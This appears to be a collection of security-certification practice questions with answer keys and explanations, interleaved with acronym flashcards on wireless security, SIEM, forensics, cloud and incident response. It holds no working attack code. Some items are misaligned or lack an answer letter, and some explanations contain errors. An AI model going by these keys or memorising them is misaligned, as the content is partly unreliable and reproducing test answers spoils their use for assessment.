C and D WPA2 uses an Advanced Encryption Standard (AES) for encryption, while WPA and WEP use RC4. WPA combines the RC4 with a Temporal Key Integrity Protocol (TKIP), while WEP uses a 24-bit Initialization Vector (IV). WPA2 is the strongest encryption scheme due to the use of AES. WPA is stronger than WEP because of the TKIP. WEP uses the 24-bit IV, which has known vulnerabilities and is the weakest encryption system of the three. A strong password, or the use of enterprise authentication, makes WPA difficult to crack. WEP is the most vulnerable due to the possibility of replay attacks. The encryption options have grown stronger with each development, with WEP deploying first, followed by WPA and WPA2.
Which of the following are types of log collection for SIEM? (Select all that apply.) A. Log aggregation B. Firewall C. Agent-based D. Listener/Collector
C and D With the agent-based approach, one must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage. With the listener/collector approach, rather than installing an agent, hosts can be configured to push updates to the SIEM server using a protocol such as syslog or SNMP. A process runs on the management server to parse and normalize each log/monitoring source. Log aggregation refers to normalizing data from different sources so that it is consistent and searchable and does not refer to a type of log collection Firewalls are a source of logs that are often sent into a SIEM but is not a type of log collection for SIEMs.
CASB
Cloud Access Security Broker
CN
Common Name
CSRF
Cross-Site Request Forgery
A network manager suspects that a wireless network is undergoing a deauthentication attack. Applying knowledge of wireless network attacks, which scenario best supports the network manager's suspicion? A. A network experiences radio interference, which causes connectivity issues for users. The users disconnect from the network, and upon reauthenticating, they log on to an evil twin Access Point (AP). B. An attacker creates an Access Point (AP) using a similar name as a legitimate AP, in an attempt to have users authenticate through the rogue AP in order to gain authentication information. C. A rogue Access Point (AP) captures user logon attempts. The attacker uses this information to authenticate to the system and obtain critical data. D. A group of users suddenly disconnects from the network. When the users reconnect, they actually connect to an evil twin Access Point (AP), which gives an attacker information about authentication.
D A deauthentication attack, coupled with the use of a rogue AP, sends a stream of spoofed deauth frames to cause a client to deauthenticate from the AP. This may allow the attacker to interpose the rogue AP or to sniff information about the authentication process. Jamming occurs when a wireless network experiences interference from other radio sources. An attacker may jam a network to position an evil twin on the network. An attacker that creates an AP using a similar name as a legitimate AP is creating an evil twin. A rogue AP is usually coupled with another attack, such as jamming or deauthentication, to obtain critical information.
A client contacts a server for a data transfer. Instead of requesting TLS1.3 authentication, the client claims legacy systems require the use of SSL. What type of attack might a data transfer using this protocol facilitate? A. Credential harvesting B. Key stretching C. Phishing D. Man-in-the-middle
D A downgrade attack can be used to facilitate a man-in-the-middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths, making it easier for a malicious actor to forge the trusted certificate authority's signature. Credential harvesting is a campaign specifically designed to steal account credentials. Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key, adding extra layers of processing to a potential attacker's task. Phishing is a combination of social engineering and spoofing. It persuades or tricks the target into interacting with a malicious resource disguised as a trusted one, traditionally using email as the vector.
The security team at an organization looks to protect highly confidential servers. Which method does the team propose when protecting the servers against explosives? A. Air gap B. Faraday cage C. Colocation cage D. Vault
D A vault is a room that is hardened against unauthorized entry by physical means, such as drilling or explosives. An air gapped host is one that is not physically connected to any network. Such a host would also normally have stringent physical access controls, such as housing it within a secure enclosure. A faraday cage is an enclosure that features a charged conductive mesh that blocks signals from entering or leaving the area. Some data centers may contain racks with equipment owned by different companies (colocation). Technicians can install these racks inside cages so that they can only physically access the racks housing their own company's servers.
Compare and analyze the types of firewalls available to differentiate between them. Choose the answer with the most correct description. A. Packet filtering firewalls operate at layer 5 of the OSI model, while circuit-level stateful inspection firewalls operate at layer 3. B. An appliance firewall is also known as a stateful multilayer inspection or a deep packet inspection. An application aware firewall is a stand-alone hardware firewall that performs the function of a firewall only. C. A packet filtering firewall maintains stateful information about a connection between two hosts and implements an appliance firewall as a software application running on a single host. D. An application firewall can analyze the HTTP headers to identify code that matches a pattern, while an appliance firewall monitors all traffic passing into and out of a network segment.
D An application firewall can inspect the contents of packets at the application layer and can analyze the HTTP headers. It also analyzes the HTML code present in HTTP packets, to try to identify code that matches a pattern in its threat database. Packet filtering firewalls operate at level 3 of the OSI model while circuit-level stateful inspection firewalls operate at layer 5 of the model. An application aware firewall is also known as a stateful multilayer inspection or a deep packet inspection. An appliance firewall is a stand-alone hardware firewall that performs the function of a firewall only. A packet filtering firewall is stateless, and an application firewall is a software application running on a single host.
The owner of a company asks a network manager to recommend a mobile device deployment model for implementation across the company. The owner states security is the number one priority. Which deployment model should the network manager recommend for implementation? A. BYOD since the company can restrict the usage to business only applications. B. CYOD because even though the employee picks the device, the employee only conducts official business on it. C. COPE since only company business can be conducted on the device. D. COBO because the company retains the most control over the device and applications.
D Corporate Owned, Business Only (COBO) devices provide the greatest security of the four mobile device deployment models. The device is the property of the company and may only be used for company business. The Bring Your Own Device (BYOD) model is the least secure of the four models. The device is owned by the employee, and the employee agrees to use it for company use. Deploying a Choose Your Own Device (CYOD) model means the device is chosen by the employee and owned by the company. The employee is able to use the device for personal business. A Corporate Owned, Personally-Enabled (COPE) device is supplied and chosen by the company and personal use is allowed.
A hospital must balance the need to keep patient privacy information secure and the desire to analyze the contents of patient records for a scientific study. What cryptographic technology can best support the hospital's needs? A. Blockchain B. Quantum computing C. Perfect forward security (PFS) D. Homomorphic encryption
D Homomorphic encryption is used to share privacy-sensitive data sets. It allows a recipient to perform statistical calculations on data fields, while keeping the data set as a whole encrypted, thus preserving patient privacy. Blockchain uses cryptography to secure an expanding list of transactional records. Each record, or block, goes through a hash function. Each block's hash value links to the hash value of the previous block. Quantum computing could serve as a secure foundation for secure cryptosystems and tamper-evident communication systems that would allow secure key agreement. Perfect forward security (PFS) mitigates the risks from RSA key exchanges through the use of ephemeral session keys to maintain confidentiality.
Analyze the methods for authentication to a Secure Shell (SSH) and determine which statement best summarizes the host-based authentication method. A. The user's private key is configured with a passphrase that must be input to access the key. B. The client submits credentials that are verified by the SSH server using RADIUS. C. The client submits a Ticket Granting Ticket (TGT) that is obtained when the user logged onto the workstation. D. The client sends a request for authentication and the server generates a challenge with the public key.
D In host-based authentication, the server is configured with a list of authorized client public keys. The client requests authentication using one of these keys and the server generates a challenge with the public key. The public key authentication method uses the user's private key that is configured with a passphrase that the user must input to access the key. The username and password method require the client to submit credentials that the SSH server verifies against a local user database. The Kerberos method requires the client to submit the Kerberos credentials (TGT) that are obtained when the user logged onto the workstation.
A security expert archives sensitive data that is crucial to a legal case involving a data breach. The court is holding this data due to its relevance. The expert fully complies with any procedures as part of what legal process? A. Chain of custody B. Due process C. Forensics D. Legal hold
D Legal hold refers to information that the security expert must preserve, which may be relevant to a court case. Regulators or the industry's best practice may define the information that is subject to legal hold. Chain of custody reinforces the integrity and proper handling of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations of tampering with the evidence. Due process is a common law term used in the US and UK to require that people only be convicted of crimes following the fair application of the laws of the land. Forensics is the practice of collecting evidence from computer systems to a standard that a court of law will accept.
When provisioning application services in network architecture, an engineer uses a microservices approach as a solution. Which principle best fits the engineer's implementation? A. Components working together to perform a workflow B. Being closely mapped to business workflows C. The performing of a sequence of automated tasks D. Each program or tool should do one thing well
D Microservice-based development uses a philosophy that each program or tool should do one thing well. Each microservice should be capable of developing, testing, and deploying independently, and said to be highly decoupled, rather than just loosely decoupled. Service-oriented architecture (SOA) conceives of atomic services closely mapped to business workflows. Each service takes defined inputs and produces defined outputs. Services integration refers to ways of making these decoupled service or microservice components work together to perform a workflow. Orchestration performs a sequence of automated tasks. Orchestrated steps run numerous automated scripts or API service calls.
A hotel guest opens their computer and logs into the Wi-Fi without prompting the guest for a username and password. Upon opening an internet browser, a splash page appears that requests the guest's room number and last name for authentication. Which type of authentication is the hotel utilizing? A. Protected B. Extensive C. Group D. Open
D Mostly used on a public access point, open authentication does not require the client to authenticate, as it sends data over the link unencrypted. When combined with a secondary authentication mechanism, a browser can manage open authentication. The secondary authentication redirects the client to a captive portal or a splash page. Wi-Fi Protected Setup (WPS) requires all of the wireless devices to be WPS capable and use a PIN. This type of authentication is common for residential consumers. Extensible Authentication Protocol (EAP) supports different types of authentication within the same overall topology of devices. EAP implementations can include smart cards, one-time passwords, and biometric scanning for authentication. Group authentication uses a pre-shared key that employs a passphrase to generate the key that encrypts communication. The group uses the same secret key.
A network manager is installing a new switch on the network. Which option does the manager use to harden network security after installation? A. A Group Policy Object (GPO) should be configured to deploy custom settings. B. The Server Core option should be used to limit the device to only using Hyper-V and DHCP. C. Microsoft Baseline Security Analyzer (MBSA) is used on Windows networks and validates the security configuration of a Windows system. D. The network manager should ensure all patches are applied and it is appropriately configured.
D Network appliances, such as switches, present a special case for hardening. Most of these devices are often only configurable within the parameters allowed by their manufacturers. Hardening is often restricted to ensuring the device is patched and configured correctly. GPOs are used on Windows networks and are a means of applying security settings across a range of computers. Since the switch is a network appliance, a GPO is not applicable in this situation. The Server Core option may be utilized when installing a server on the network. It excludes most of the familiar shell tools and only supports a limited number of roles, including Hyper-V and DHCP. Microsoft Baseline Security Analyzer (MBSA) is used on Windows networks and validates the security configuration.
The IT team at a company discovers that a Windows server is infected with malware. As a result, the server is not functioning properly. Which event log does the team review to find errors from failing services related to newly installed software? A. Setup B. Security C. System D. Application
D On a Windows system, the application event logs record events generated by applications and services, such as when a service run by a third-party application cannot start. On a Windows system, the setup log contains events generated during the installation of the Windows operating system (OS). Security event logs on a Windows system record and reveal audit events, such as a failed logon or access to a file being denied. The system event logs on a Windows system include events generated by the operating system and its services, such as storage volume health checks.
Evaluate the typical weaknesses found in network architecture and determine which statement best aligns with a security weakness. A. A company has a single network channel. B. A company has many different systems to operate one service. C. A company has a habit of implementing quick fixes. D. A company has a flat network architecture.
D Overdependence on perimeter security occurs when the network architecture is flat. If an attacker can penetrate the network edge, the attacker will then have freedom of movement throughout the entire network. A single point of failure occurs with a "pinch point" by relying on a single hardware server or appliance or network channel. Complex dependencies are services that require many different systems to be available. Ideally, the failure of individual systems or services should not affect the overall performance of other network services. Availability over confidentiality and integrity occurs when a company takes shortcuts to get a service up and running. Compromising security might represent a quick fix but creates long term risks.
Analyze the following attacks to determine which best illustrates a pharming attack. A. A customer gets an email that appears to be from their insurance company. The email contains a link that takes the user to a fake site that looks just like the real insurance company site. B. An employee gets a call from someone claiming to be in the IT department. The caller says there was a problem with the network, so they need the employee's password in order to restore network privileges. C. A company's sales department often has after-hour training sessions, so they order dinner delivery online from the restaurant across the street. An attacker is able to access the company's network by compromising the restaurant's unsecure website. D. A customer enters the correct URL address of their bank, which should point to the IP address 172.1.24.4. However, the browser goes to 168.254.1.1, which is a fake site designed to look exactly like the real bank site.
D Pharming is a means of redirecting users from a legitimate website to a malicious one that relies on corrupting the way the victim's computer performs IP address resolution. This is illustrated in the bank customer scenario. Phishing is a type of email-based social engineering attack, in which the attacker sends email from a supposedly reputable source to try to elicit private information from the victim. This is exhibited in the insurance customer scenario. Vishing is a phishing attack conducted through a voice channel. This is seen in the IT department scenario. A watering hole attack relies on the circumstance that a group of targets may use an unsecure third-party website. This is shown in the sales department scenario.
A company has recently started using a Platform as a Service (PaaS). Compare cloud service types to determine what is being deployed. A. The company has leased servers and a Storage Area Network (SAN). B. The company has leased a suite of applications that were outside of the budget to purchase outright. C. The company has outsourced the responsibility for information assurance. D. The company has leased an instance that runs Microsoft Azure SQL Database.
D Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS. A typical PaaS solution would provide servers and storage network infrastructure (as per IaaS) but also provide a multi-tier web application/database platform on top. IaaS is a means of provisioning resources such as servers, load balancers, and Storage Area Network (SAN) components quickly. SaaS is a different model of provisioning software applications. Rather than purchasing software licenses for a given number of seats, a business can access software hosted on a supplier's servers on a pay-as-you-go or lease arrangement. Managed Security Services Provider (MSSP) is a means of fully outsourcing responsibility for information assurance to a third party.
Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message? A. Hashing and symmetric encryption B. Public key cryptography and digital enveloping C. Hashing and digital enveloping D. Public key cryptography and hashing
D Public key cryptography (public and private keys) can be used to authenticate a sender. Combine this with a hash output of the message and a secret (or private) key to create a message authentication code (MAC) to validate the integrity of the message. A key exchange system known as a digital envelope or hybrid encryption combines the bulk encryption capabilities of symmetric encryption with the authentication capability of public key cryptography. Asymmetric encryption is also called public key cryptography. A digital envelope allows the sender and recipient to exchange a symmetric encryption key securely by using public key cryptography. Hashing proves integrity by computing a unique checksum from input. Digital envelope is another term for the hybrid encryption that combines public key encryption and symmetric encryption.
Given that layer 2 does not recognize Time to Live, evaluate the potential problems to determine which of the following options prevents this issue. A. ICMP B. L2TP C. NTP D. STP
D STP (Spanning Tree Protocol) is a switching protocol that prevents network loops by dynamically disabling links as needed. Since layer 2 protocol has no concept of Time To Live, layer 2 broadcast traffic could continue to loop through a network with multiple paths indefinitely. ICMP (Internet Control Message Protocol) is an IP-level protocol for reporting errors and status information that supports the function of troubleshooting utilities such as ping. L2TP (Layer 2 Tunneling Protocol) is the standard VPN (Virtual Private Network) protocol for tunneling point-to-point sessions across a variety of network protocols. NTP (Network Time Protocol) is a Transmission Control Protocol/Internet Protocol (TCP/IP) application protocol allowing machines to synchronize to the same time clock that runs over UDP port 123.
A recent systems crash prompts an IT administrator to perform recovery steps. Which mechanism does the administrator use to achieve nonpersistence? A. Configuration validation B. Data replication C. Restoration automation D. Revert to known state
D Snapshot/revert to known state is a saved system state that the administrator can reapply to the instance on a system. This is a mechanism that achieves nonpersistence. Configuration validation is a process that ensures that a recovery solution is working at each layer (hardware, network connectivity, data replication, and application). Data replication is a process of reinstating data on a system. Nonpersistence would occur by separating any system restore from data replication. Automation may restore a system as software may build and provision an instance according to any template instructions. This is a mastering instruction.
A systems breach occurs at a financial organization. The system in question contains highly valuable data. When performing data acquisition for an investigation, which component does an engineer acquire first? A. RAM B. Browser cache C. SSD data D. Disk controller cache
D The order of volatility outlines a general list of which components the engineer should examine for data. The engineer should first examine CPU registers and cache memory (including the cache on disk controllers and GPUs). The engineer should acquire contents of nonpersistent system memory (RAM), including routing tables, ARP caches, process tables, and kernel statistics after any cache memory. The engineer performs data acquisition on persistent mass storage devices after any available system caches or memory. This includes temporary files, such as those found in a browser cache. The engineer performs data acquisition on persistent mass storage devices (such as HDDs or SSDs) after any available system caches or memory.
Based on knowledge of the fundamentals of One-time Passwords (OTP), which of the following choices represents the problem that exists with HMAC-based One-time Password Algorithm (HOTP) and is addressed by Time-based One-time Password Algorithm (TOTP)? A. HOTP is not configured with a shared secret. B. The server is not configured with a counter in HOTP. C. Only the HOTP server computes the hash. D. Tokens can be allowed to continue without expiring in HOTP.
D Tokens can persist unexpired in HOTP, increasing the risk of an attacker obtaining one and decrypting data in the future. TOTP addresses this by adding a value to the shared secret derived from the device's and server's local timestamp. TOTP automatically expires each token after a short window of time. The authentication server and client token are configured with the same shared secret in HOTP. The HOTP server is configured with a counter, combining with the shared secret to create a one-time password. When the HOTP value is authenticated, it increments by one. The server and the device both compute the hash and derive a 6-8 digit HOTP value.
An IT director reads about a new form of malware that targets a system widely utilized in the company's network. The director wants to discover whether the network has been targeted, but also wants to conduct the scan without disrupting company operations or tipping off potential attackers to the investigation. Evaluate vulnerability scanning techniques and determine the best tool for the investigation. A. Credentialed scan B. Configuration review C. Penetration testing D. Threat hunting
D Where a pen test attempts to demonstrate a system's weakness or achieve intrusion, threat hunting is based only on analysis of data within the system. It is potentially less disruptive than pen testing. A credentialed scan has a user account with logon rights to hosts and permissions appropriate for the testing routines. Credentialed scans are intrusive and allow in-depth analysis and insight to what an insider attack might achieve. A configuration review assesses the configuration of security controls and application settings & permissions compared to established benchmarks. Penetration testing, an intrusive, active scanning technique, does not stop at detection, but attempts to gain access to a system.
The National Institute of Standards and Technology (NIST) provides a framework that classifies security-related functions. Which description aligns with the "respond" function? A. Evaluate risks, threats, and vulnerabilities. B. Perform ongoing, proactive monitoring. C. Implement resilience to restore systems. D. Identify, analyze, and eradicate threats.
D The identify function is to develop security policies and capabilities. This function is used to evaluate risks, threats, and vulnerabilities and recommend security controls to mitigate them. The detect function is to perform ongoing, proactive monitoring to ensure that controls are effective and capable of protecting against new types of threats. The recover function is to implement cybersecurity resilience to restore systems and data if other controls are unable to prevent attacks. The respond function is to identify, analyze, contain, and eradicate threats to systems and data security.
ESP
Encapsulated Security Payload
FRR
False Rejection Rate
GLBA
Gramm-Leach-Bliley Act
GUI
Graphical User Interface
HOTP
HMAC-based One-Time Password
HTST
HTTP Strict Transport Security
IoC
Indicators of Compromise
ISAC
Information Sharing and Analysis Center
IV
Initialization Vector
ISO
International Organization for Standardization
ICMP
Internet Control Message Protocol
IKE
Internet Key Exchange
IMAP4
Internet Message Access Protocol v4
NIDS
Network Intrusion Detection System
PFS
Perfect Forward Secrecy
PaaS
Platform as a Service
POP3S
Post Office Protocol Version 3 Secure
Examine each statement and determine which most accurately describes a major limitation of quantum computing technology. A. Presently, quantum computers do not have the capacity to run useful applications. B. Quantum computing is not yet sufficiently secure to run current cryptographic ciphers. C. Quantum computing is not sufficiently agile to update the range of security products it most frequently uses. D. Attackers may exploit a crucial vulnerability in quantum computing to covertly exfiltrate data.
Presently, the most powerful quantum computers have about 50 qubits. A quantum computer will need about a million qubits to run useful applications. Quantum computing could put the strength of current cryptographic ciphers at risk, but it also has the promise of underpinning more secure cryptosystems in the future. Cryptographic agility refers to an organization's ability to update the specific algorithms used in security products without affecting the business workflows that those products support. Quantum computing could pose a threat to cryptographic agility. Steganography obscures the presence of a message and can be used for data exfiltration. The quantum computing properties of entanglement, superposition, and collapse suit the design of a tamper-evident communication system that would allow secure key agreement.
RADIUS
Remote Authentication Dial-In User Service
REST
Representational State Transfer
RRset
Resource Records Set
RSA
Rivest, Shamir, Adelman
SA
Security Associations
SAE
Simultaneous Authentication of Equals
SLE
Single Loss Expectancy
STP
Spanning Tree Protocol
SEH
Structured Exception Handler
TAXII
Trusted Automated eXchange of Indicator Information
MitM
man-in-the-middle
NIST
National Institute of Standards and Technology
The U.S. Department of Defense (DoD) awards an IT contract to a tech company to perform server maintenance. The servers are colocated at a third-party storage facility. The DoD and the tech company enter into what type of agreement which commits the tech company to implement the agreed upon security controls? A. Interconnection security agreement (ISA) B. Non-disclosure agreement (NDA) C. Data sharing and use agreement D. Service level agreement (SLA)
A Any federal agency interconnecting its IT system to a third party must create an ISA to govern the relationship. An ISA sets out a security risk awareness process and commits the agency and supplier to implementing security controls. An NDA establishes a legal basis for protecting information assets. If a party breaks this agreement and shares prohibited information, they may face legal consequences. Data sharing and use agreements specify the purpose for which an entity can collect and analyze data, and proscribes the use of re-identification techniques. An SLA is a contractual agreement detailing the terms under which a contractor provides service. This includes terms for security access controls and risk assessments plus processing requirements for confidential and private data.
Which statement best describes how a hierarchical certificate authority (CA) trust model mitigates the weakness in a single CA model and guards against the compromise of the root CA? A. The hierarchical CA model still uses a single root CA, but delegates certificate granting authority to intermediate CAs, so the root CA may go offline in a secure configuration. B. The hierarchical CA model uses multiple root CAs to issue certificates, so if a root is damaged or compromised, the structure does not collapse. C. The hierarchical CA model still uses a single root CA, but delegates certificate granting authority to intermediate CAs, so the root may stay online in a secure, redundant configuration. D. The hierarchical CA model uses multiple root CAs to issue certificates so any one of the root CAs may go offline in a secure storage configuration while retaining certificate granting authority.
A In the hierarchical model, a single CA (called the root) issues certificates to several intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end entities). In the hierarchical model, the root is still a single point of failure. Because of the high risk compromising the root CA poses, a secure configuration involves making the root an offline CA. This means that the system disconnects the root from any network and usually keeps it in a powered-down state. Different intermediate CAs can be set up with different certificate policies, and each leaf certificate can trace back to the root CA along the certification path. This is also referred to as certificate chaining or a chain of trust.
Management looks to IT for a solution to identify successful and failed login attempts. Which solution will IT provide to management? A. Logs B. Network monitors C. Packet capture D. Sniffer
A Logs are one of the most valuable sources of security information. A system log can be used to diagnose availability issues. A security log can record both authorized and unauthorized uses of a resource or privilege. A network monitor collects data about network appliances, such as switches, access points, routers, firewalls, and servers. A monitor is used to monitor load status for CPU/memory, state tables, disk capacity, and more. Data captured from network packet capture provides both summary statistics about bandwidth and protocol usage. Sensors/sniffers are used for packet capture and provide summary of statistics along with protocol usage and the opportunity for detailed frame analysis.
The IT director at a financial institution grants account permissions using an access control list (ACL). This illustrates what type of security control? A. Preventative B. Deterrent C. Corrective D. Detective
A Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Deterrent controls may not physically or logically prevent access, but psychologically discourages an attacker from attempting an intrusion. Signs and warnings of legal penalties against trespass or intrusion are deterrent controls. Corrective controls are typically implemented after an attack with the goal of eliminating or reducing the impact of an intrusion event. Detective controls may not prevent or deter access, but they will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack.
A power outage disrupts a medium-sized business, and the company must restore systems from backups. If the business can resume normal operations from a backup made two days ago, what metric does this scenario represent? A. Recovery Point Objective (RPO) B. Recovery time objective (RTO) C. Maximum tolerable downtime (MTD) D. Work Recovery Time (WRT)
A RPO is the amount of data loss a system can sustain, measured in time. That is, if a virus destroys a database, an RPO of 24 hours means the system can recover the data (from a backup copy) to a point not more than 24 hours before the infection. RTO is the post-disaster period an IT system may remain offline, including the amount of time it takes to identify a problem and perform recovery. MTD is the longest period of time that a business function outage may occur, without causing irrecoverable business failure. Following system recovery, WRT is the additional work necessary to reintegrate systems, test functionality, and brief users on changes and updates to fully support the business function.
Which of the following has a cyber security framework (CSF) that focuses exclusively on IT security, rather than IT service provisioning? A. National Institute of Standards and Technology (NIST) B. International Organization for Standardization (ISO) C. Control Objectives for Information and Related Technologies (COBIT) D. Sherwood Applied Business Security Architecture (SABSA)
A The National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) is a relatively new addition to the IT governance space, and is distinct from other frameworks by focusing exclusively on IT security, rather than IT service provision more generally. ISO develops standards and frameworks governing the use of computers, networks, and telecommunications, including ones for information security (27000 series). It is a commercial product. COBIT is an IT governance framework with security as a core component. COBIT is published by ISACA and is also a commercial product, available through APMG International. SABSA is a methodology for providing information assurance aligned to business needs and driven by risk analysis.
During a cyber incident response exercise, a blue team takes steps to ensure the company and its affiliates can still use network systems while managing a simulated threat in real-time. Based on knowledge of incident response procedures, what stage of the incident response process is the blue team practicing? A. Containment B. Identification C. Eradication D. Recovery
A The goal of the containment stage is to secure data while limiting the immediate impact on customers and business partners. Based on an alert or report, identification determines whether an incident has taken place, how severe it might be (triage), and notifies stakeholders. Once the security admin contains the incident, eradication removes the cause and restores the affected system to a secure state. When security admin eradicates the cause of the incident, they can reintegrate the system into the business process that it supports. This recovery phase may involve restoration of data from backup and security testing.
A business is setting up new network devices. The network devices are critical and the manager wants to ensure that they have access despite the high turnover of personnel in the IT industry. They set up accounts through a RADIUS server that are normally used to log in. What should they configure as a backup? A. Administrator/Root account B. Administrator's user account C. Network service account D. Local service account
A The local system account creates the host processes that start Windows before the user logs on. Administrative or privileged accounts can install and remove apps and device drivers. Admin should prohibit superuser accounts from logging on in normal circumstances. Admin should replace the default superuser with named accounts that have sufficient elevated privileges for a given job role. This ensures that admin can audit administrative activity and the system conforms to non-repudiation. A network service account has the same privileges as the standard user account but can present the computer's account credentials when accessing network resources. A local service account has the same privileges as the standard user account. It can only access network resources as an anonymous user.
Analyze the factors associated with performing a Business Process Analysis (BPA) and select the statement that aligns with the output factors. A. The data or resources a function produces B. The source of information for performing a function C. The resources supporting a function D. A description of how a function is performed
A The output factors are data or resources produced by a function. This is one of five factors that should be identified when performing a Business Process Analysis (BPA). A BPA is performed to identify dependencies, which should be reduced as much as possible between critical components. The input factors are the sources of information for performing a function, including the resulting impact if these are delayed or out of sequence. This can include data entered into a system, or data flowing from other systems or sites. The staff support the function and may also include other resources. BPAs are all encompassing, including the staff that monitor, maintain, and repair the systems that process data. Process flow is a step by step description of how a function is performed. For example, a flow chart showing the process from start to end. This chart can show dependencies and the results of failures within the process.
Which statement correctly differentiates between file transfer protocol (FTP), secure shell file transfer protocol (SFTP), and file transfer protocol over secure socket layer (FTPS)? A. FTP has no encryption. FTPS adds transport layer security (TLS), and SFTP is an entirely different protocol based on the network protocol SSH (secure shell). B. FTP uses only basic encryption, while SFTP adds a layer of security with secure shell (SSH). FTPS uses an entirely different protocol, using secure port 990. C. FTP has no encryption. SFTP adds a layer of security with secure shell (SSH), and FTPS uses an entirely different protocol, using secure port 990. D. FTP uses only basic encryption, while FTPS adds transport layer security (TLS), and SFTP is an entirely different protocol based on the network protocol SSH (secure shell).
A Unlike both FTP and FTPS, SFTP uses only one connection and encrypts both authentication information and data files being transferred. SFTP addresses FTP's privacy and integrity issues by encrypting the authentication and data transfer between client and server. SFTP establishes a secure link using Secure Shell (SSH) over transmission control protocol (TCP) port 22. SFTP enables the use of ordinary FTP commands and data transfer over the secure link without risk of eavesdropping or man-in-the-middle attacks. This solution requires an SSH server that supports SFTP and SFTP client software. FTPS secures FTP using the connection security protocol SSL/TLS. FTPS negotiates an SSL/TLS tunnel before exchanging any FTP commands. This mode uses the secure port 990 for the control connection.
A company follows a bring your own device (BYOD) mobile implementation. What is an ideal solution the company can use to overcome some of the security risks involved with employee-supplied devices? A. Virtual desktop infrastructure (VDI) B. Location services C. Remote wipe D. Carrier unlocking
A Virtual desktop infrastructure (VDI) means provisioning an OS desktop to interchangeable hardware. The hardware only has to be capable of running a VDI client viewer or have a browser support a clientless HTML5 solution. Each time a user accesses VDI, the session is "as new" and employees can remotely access it. Location services alone represent a security risk. Location services can use geo-fencing to enforce context-aware authentication based on the device's location. If a malicious actor steals a user's device using a remote wipe (kill switch), it can reset the device to factory defaults or clear personal data (sanitization). Carrier unlocking involves the removal of restrictions that lock a device to a single carrier and uses it for privilege escalation.
Compare the components found in a virtual platform and select the options that accurately differentiate between them. (Select all that apply.) A. Hypervisors are Virtual Machine Monitors (VMM) and guest operating systems are Virtual Machines (VM). B. Hypervisors facilitate interactions with the computer hardware and computers are the platform that hosts the virtual environment. C. Computers are the operating systems that are installed under the virtual environment and guest operating systems are the platform that host the virtual environment. D. Hypervisors are not operating systems and computers are the platforms that host the virtual environment.
A and B Hypervisors are the Virtual Machine Monitor (VMM) and guest operating systems are the Virtual Machines (VM) found within the virtual platform. Hypervisors manage the virtual machine environment and facilitate interaction with the computer hardware and network. The computer component is the platform that hosts the virtual environment. Multiple computers may also be networked together. Computers are the platform of the virtual environment and guest operating systems are the operating systems installed under the virtual environment. Guest operating systems are the operating systems installed under the virtual environment and computers are platform that hosts the virtual environment.
Which features distinguish a next-generation endpoint detection and response (EDR) product from traditional EDR solutions? (Select all that apply.) A. Next-generation endpoint agents use cloud management, rather than reporting to an on-premises server. B. Next-generation endpoint detection systems use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis (UEBA). C. Next-generation endpoint agents report baseline configuration deviations, whereas legacy systems report threats based on signature-detection. D. The primary purpose of next-generation endpoint agents is to stop initial threat execution, while traditional systems aim to detect and report attacks.
A and B Where earlier endpoint protection suites report to an on-premises management server, next-generation endpoint agents are more likely to be managed from a cloud portal. Next-generation endpoint agents use artificial intelligence (AI) and machine learning to perform user and entity behavior analysis as part of the security service provider's offering. Baseline deviation reporting means testing the actual configuration of hosts to ensure that their configuration settings match the baseline template. An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.
A security specialist reviews an open closet with network cables and discovers highly exposable areas that are at high risk of physical intrusion. The specialist recommends creating a protected distribution system (PDS) to lower security risks. What would a PDS help solve? (Select all that apply.) A. Eavesdropping B. Speed C. Damage D. Length
A and C A physically secure cabled network is referred to as a protected distribution system (PDS). This method of cable installation can deter eavesdropping. A hardened PDS is one where all cabling is routed through sealed metal conduit. This type of enclosure protects the cabling from accidental or intentional damage. The speed, or throughput, of a network cable is dependent on the type of cable such as Cat5 versus Cat6. The cable speed is typically based on the number of twists inside the cable and is not a security concern. The length of a network cable is dependent on the type of cable such as Cat5 versus Cat6. The cable length dictates how far signal can travel and is not a security concern.
A suspected malicious insider at a company conducted a network attack. A security manager, who personally knew the insider, conducts forensic analysis looks for evidence of misconduct on the employee's workstation and in system logs. The manager packages the data for further review but modifies it by removing certain fields of data to make it easier to review. Examine the scenario and determine what argument a defense attorney might bring up concerning the forensic investigative process. (Select all that apply.) The examiner conducted analysis with bias. The examiner tampered with evidence by accessing system logs. The examination did not follow ethical procedures. E-discovery tools applied biased filters to the evidence for research.
A and C Investigators must perform analysis without bias. Investigators should form conclusions and opinions only from the direct evidence under analysis. Defense counsel may try to use any deviation of good ethical and professional behavior to have the forensics investigator's findings dismissed. Ideally, investigators must not change or manipulate the evidence. If a device used as evidence must be manipulated to facilitate analysis, the reasons for doing so must be sound and the process of doing so must be recorded. E-discovery search tools, such as word and semantic searches, allow investigators to locate files of interest to the case. Tags apply standardized keywords or labels to files and metadata to help organize the evidence according to relevance or confidentiality.
A user enters the web address of a favorite site and the browser returns the following: "There is a problem with this website's security certificate." The user visits this website frequently and has never had a problem before. Applying knowledge of server certificates, select the circumstances that could cause this error message. (Select all that apply.) A. The system's time setting is incorrect. B. The certificate is pinned. C. The web address was mistyped. D. The certificate expired.
A and D If the date and time settings on the system are not synchronized with the server's setting, the server's certificate will be rejected. An expired server certificate would cause the browser to return an error message. Certificate pinning ensures that when a client inspects the certificate presented by a server, it is inspecting the proper certificate. This is mostly done to prevent a Man-in-the-Middle attack and would not generate an error message. A mistyped web address would not return an error message about the server certificate. It would return a message that the website could not be found.
An engineer implements a security solution to protect a domain. The engineer decides on DNS Security Extensions (DNSSEC) to prevent spoofing. Which features does the engineer rely on for protection? (Select all that apply.) A. Zone Signing Key B. RRset package C. Access Control List D. Key Signing Key
